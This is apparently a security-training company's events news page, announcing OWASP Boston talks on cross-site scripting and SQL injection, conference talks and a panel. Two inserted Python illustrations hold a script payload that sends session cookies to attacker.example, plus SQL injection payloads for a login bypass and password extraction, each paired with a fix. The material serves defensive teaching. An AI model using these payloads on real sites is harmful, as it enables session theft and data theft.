News from the ‘Events’ Category

OWASP Boston Lightning Talk: Cross Site Scripting, Reflected and Persistent

In the second installment of Safelight’s Lightning Talk series, Rob Cheyne will present the basics of cross-site scripting (XSS) at OWASP Boston.

He will cover the two primary forms of XSS, reflected and persistent (stored), and give detailed demonstrations of how an attacker would use each in the real world.


As part of the demo, Rob will go beyond proof of concept and present an example of a “weaponized” JavaScript that could be used to steal another user’s session information.


Rob will also offer practical tips for defending against cross-site scripting flaws in your own applications.
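The following is an added illustration of the two forms named above and of the defence the talk points at; it is not material from the talk or Safelight code. The page-rendering functions, the comment store, the attacker host `attacker.example` and the cookie-stealing payload are all constructed for the example.

```python
import html
from typing import List

# Constructed "weaponized" payload (hypothetical attacker host): a script that
# sends the victim's cookies to a server the attacker controls.
SESSION_STEALER = (
    '<script>new Image().src="https://attacker.example/c?"'
    '+encodeURIComponent(document.cookie)</script>'
)

# --- Reflected XSS: an untrusted query parameter is echoed into the response ---

def search_page_vulnerable(query: str) -> str:
    """Echoes the search term into element content without encoding."""
    return f"<h1>Results for: {query}</h1>"

def search_page_hardened(query: str) -> str:
    """Same page; the term is HTML-encoded before it enters element content."""
    return f"<h1>Results for: {html.escape(query, quote=True)}</h1>"

# --- Persistent (stored) XSS: a comment is saved once and served to every visitor ---

COMMENTS: List[str] = []  # stands in for a database table (constructed store)

def post_comment(body: str) -> None:
    """Stores the raw comment; output encoding is applied at render time."""
    COMMENTS.append(body)

def comments_page_vulnerable() -> str:
    """Renders stored comments verbatim, so a stored payload runs for every reader."""
    return "<ul>" + "".join(f"<li>{c}</li>" for c in COMMENTS) + "</ul>"

def comments_page_hardened() -> str:
    """Renders stored comments with HTML encoding at the point of output."""
    return "<ul>" + "".join(
        f"<li>{html.escape(c, quote=True)}</li>" for c in COMMENTS
    ) + "</ul>"

def script_executes(page: str) -> bool:
    """Crude oracle: the payload reaches the browser only if it survives unencoded."""
    return SESSION_STEALER in page

def session_cookie_header(session_id: str) -> str:
    """Defence in depth: HttpOnly keeps document.cookie from exposing the session
    even if an XSS bug slips through; Secure and SameSite limit where it travels."""
    return f"Set-Cookie: session={session_id}; HttpOnly; Secure; SameSite=Lax"

if __name__ == "__main__":
    print(search_page_vulnerable(SESSION_STEALER))   # payload intact: executes
    print(search_page_hardened(SESSION_STEALER))     # payload encoded: inert text
    post_comment("Nice talk!")
    post_comment(SESSION_STEALER)
    print(comments_page_hardened())
    print(session_cookie_header("example-session-id"))
```

The contextual encoding shown (HTML element content via `html.escape`) is the primary fix; encoding rules differ for attribute values, URLs and JavaScript contexts, and the `HttpOnly` cookie flag only blunts this particular payload rather than removing the XSS flaw.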


When: June 2, 2010

Time: 6:30 p.m.

Where: Microsoft offices at the Waltham Weston Corporate Center, 201 Jones Rd., Sixth Floor Waltham, MA

Safelight Headlines OWASP Boston with Monthly Lightning Talk Series

IT Security Education Key to Defending Against OWASP Top 10 Most Critical Web Application Vulnerabilities

In the first of the Safelight Security Advisors Lightning Talk Series, CEO Rob Cheyne will present “An Introduction to SQL Injection” at the Open Web Application Security Project (OWASP) Boston chapter meeting on Monday, May 3.

Rob will cover the methodology used by professional attackers, along with detailed demonstrations of one of the most common and dangerous OWASP Top 10 issues.

After demonstrating how SQL injection can be used to run system commands and gain root access on a database server, Rob will provide practical tips for defending against SQL injection flaws.
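As an added illustration of the flaw itself (not code from the talk or from Safelight), the block below builds a constructed two-user table in an in-memory SQLite database and shows the same login query written by string concatenation and with bound parameters. The payloads `BYPASS_PAYLOAD` and `UNION_PAYLOAD` are constructed for the example; the further step of running system commands on the database host depends on the specific database product and is not shown.

```python
import sqlite3
from typing import List

# Constructed sample data; not real accounts.
SAMPLE_USERS = [("alice", "s3cret"), ("bob", "hunter2")]

# Constructed attacker inputs supplied in the username field.
BYPASS_PAYLOAD = "' OR '1'='1' --"                      # turns the WHERE clause always-true
UNION_PAYLOAD = "' UNION SELECT password FROM users --"  # reads another column back

def build_db() -> sqlite3.Connection:
    """In-memory database seeded with the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn

def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> List[str]:
    """Splices untrusted input into the SQL text, so the input can rewrite the query.
    Returns the matched usernames (sorted) so the effect is visible."""
    sql = (
        f"SELECT username FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )
    return sorted(row[0] for row in conn.execute(sql))

def login_hardened(conn: sqlite3.Connection, username: str, password: str) -> List[str]:
    """Bound parameters: values travel separately from the statement and can only
    ever be compared as data, never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return sorted(row[0] for row in conn.execute(sql, (username, password)))

if __name__ == "__main__":
    conn = build_db()
    print(login_vulnerable(conn, BYPASS_PAYLOAD, "anything"))  # every account matches
    print(login_vulnerable(conn, UNION_PAYLOAD, "anything"))   # passwords come back
    print(login_hardened(conn, BYPASS_PAYLOAD, "anything"))    # nothing matches
```

The hardened form is the practical tip in one line: keep query structure in the code and pass values as parameters. Input validation and least-privilege database accounts are worthwhile additional layers, but they do not replace it.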

Safelight’s Lightning Talks are designed for members newer to OWASP who want to understand the basics of web application security, although everyone is welcome to attend.

When: May 3, 2010, with subsequent meetings typically on the first Wednesday of the month

6:30 – 7:00 p.m. Networking
7:00 – 9:00 p.m. Main Presentations

Join the Boston mailing list.

Join Us at the RSA 2010 Conference

RSA 2010 Conference

March 1-3

Moscone Center

San Francisco, CA

Join Safelight at Booth #2058 to see the latest in information security training, including our newest online learning programs. Attend our customer presentation, Banking on Security Education, with State Street Bank’s Vice President Jeff Richard, followed by a cocktail reception from 6:00 – 8:00 p.m. at The St. Regis Hotel, to hear how this leading financial institution rolled out a comprehensive security training program for thousands of developers worldwide. You must register for this event in advance in order to attend.

Webcast: “New Technology Wearing Hand-Me-Down Vulns”

Safelight’s CEO Rob Cheyne will present a webcast for the Microsoft SDL Pro Network community on “New Technology Wearing Hand-Me-Down Vulns” on February 25, 2010 from 1:00 – 1:30 p.m. EST.

Using a web service as an example, Rob will demonstrate how classic vulnerabilities can crop up in new technologies and how applying SDL principles can help build secure systems. Register for the Webcast.

Safelight Named Member of Microsoft SDL Pro Network

At BlackHat DC 2010, Safelight Security Advisors today became a training member of Microsoft’s Security Development Lifecycle (SDL) Pro Network. Microsoft created the SDL Pro Network to help development organizations adopt the SDL and address the challenges of embedding security and privacy into their software and development culture. As one of seven new members and the only training company selected among the latest group, Safelight joins a select network of industry leaders specializing in application security with significant experience in secure development lifecycle methodologies.

“Microsoft is happy to have SafeLight join the SDL Pro Network. We believe training is a cornerstone to the SDL and SafeLight can help train developers on secure coding practices,” said David Ladd, Principal Security Program Manager, Microsoft’s Trustworthy Computing Group.

As part of the SDL Pro Network, Safelight looks forward to continuing its mission of training students in a disciplined process that is proven to reduce vulnerabilities and lower the total cost of development. Safelight’s instructor-led and online learning programs help companies incorporate security best practices into their development initiatives, offering security education courses that cover all phases of the SDL:

  • Introduction to the Microsoft Security Development Lifecycle
  • Application Security Fundamentals
  • Architecting Secure Systems
  • Language-Specific & Language-Agnostic Secure Coding
  • Testing for Secure Systems
  • Managing an SDL (for project managers and team leaders)
  • Risks of Insecure Applications (for business owners and executives)
Visit Safelight’s SDL Pro Network page at http://securityadvisors.com/sdl to learn more about our offerings.

Read Microsoft’s announcement on the new SDL Pro Network members in their press room.

Rob Cheyne Presenting at CSI 2009

Safelight’s CEO Rob Cheyne will present, “Banking on Education: A Case Study on Developer Security” at CSI 2009 on Tuesday, October 27, 2009 from 9:45-10:45 a.m.

Learn how Safelight Security Advisors helped a major U.S. bank create security training for its internal developers: both employees and contractors located in multiple countries. Attendees will learn ways to shift the mindset of this critical audience, leaving with ideas they can start to implement themselves.

CSI 2009 features a comprehensive program, covering 18 main topic areas, to provide the security knowledge needed to succeed in today’s environment. To attend, visit http://csiannual.com.

Business vs. Security: Let’s get ready to rumble!!!

I am currently preparing for the Business vs. Security panel that I am moderating at the Source:Boston conference on Wednesday, March 11th from 4:15-5:30pm.

You can read about it here. Click the link that says "The end of our rope: the ongoing tug-o-war between business and security". The gist is that we get two business people and two security people together, and they discuss the finer points of managing business and security requirements in real-world environments. Many of us have been there. Security people have a notoriously difficult time convincing the business that security is important, and business folks are just trying to run the company and often view security as a speed bump.

I’m very excited to moderate this panel two years in a row. It is relatively rare to get security and business people together at one table with the sole purpose of discussing how security impacts real-world decisions. As they say on TV, "Let’s get ready to rumble!"

How you can help

Below are some examples of questions I could ask the panelists. I have a much longer list, but I think it would be much more interesting to open this up to the security community. So, given this opportunity, what questions would YOU like me to ask the panelists?

Sample questions:
  • When you are "selling" security, how do you get appropriate attention when you are talking about what MIGHT happen instead of things that ARE happening? You are essentially asking people to spend money on a problem that "THEY DON’T HAVE". How do you justify the expense?
  • Whose responsibility IS it to manage security?
  • With security, it is possible to spend an unknown amount of money on an intangible problem. What is the right amount to spend?
  • As an industry, security people tend to NOT be very good at communicating security concepts to NON security people. How do you communicate technical security concepts to business people in a way that they get it?

See you at the conference!
–rob

Paul Hinkle presenting at SD West on March 13th

Banking on Education: A Case Study on Developer Security Training

Speaker: Paul Hinkle (Chief Technology Officer, Safelight Security Advisors)
Date/Time: Friday (March 13, 2009) 1:30pm — 3:00pm
Track: Security
Presentation Format: 90-minute Case Studies
Audience level: All

Presentation Abstract

Four years in the making, State Street Bank has created a pioneering security education program for its internal developers: both employees and contractors located in multiple countries. This case study will discuss how to properly implement an internal security training program. It will discuss the unique challenges State Street faced, how they were addressed, and the process the company went through to create a successful training program that is now mandatory for all staff involved in systems development worldwide.

Please email info@securityadvisors.com for a discount code to receive $100 off the lowest price.

Safelight Trains Government Security Leaders at Conference on California’s Future

Educates IT and developers on latest threats and how to secure Web applications

What: Conference on California’s Future
When: May 12-16, 2008

Sacramento Convention Center
1400 J Street Sacramento, California 95814

Instructor: Paul Hinkle, CTO, Safelight Security Advisors

Security Training

Threat Update

Monday, May 12, 2008, 9:00 a.m. – 12:00 p.m.

Audience: IT network administrators and managers

The news is full of stories of stolen laptops, hacked databases and identity theft on a massive scale. From social engineering and spam, to directed attacks and virtualized rootkits, learn how different threats may impact the overall security posture of your organization. This half-day course brings you up to date with the latest attack methods, and anticipates some of the changes the industry expects in the near future.

Securing your Web Applications

Monday, May 12, 2008, 1:30 p.m. – 4:30 p.m.

Audience: application developers, project managers and business analysts

According to Acunetix (a vendor of Web application scanning tools), 70% of applications they reviewed contained high or medium ranked security vulnerabilities. Learn how to develop more secure applications using simple, repeatable steps. This introductory half-day session includes: demonstrations of key attacks, step-by-step analysis of those attacks and solid countermeasures that any development team can use in its Web environment.

Conference Mashups

I am out at the RSA Conference this week, and like every year, I am stunned by the number of product vendors selling “silver bullet” technology solutions to solve all of life’s security problems. Seeing the make-up of the expo floor, you would think that you can just throw lots of technology at a problem in order to make it go away. Given that real solutions always incorporate people, process and technology, it always amazes me that most vendors pretty much ignore the first two. (more…)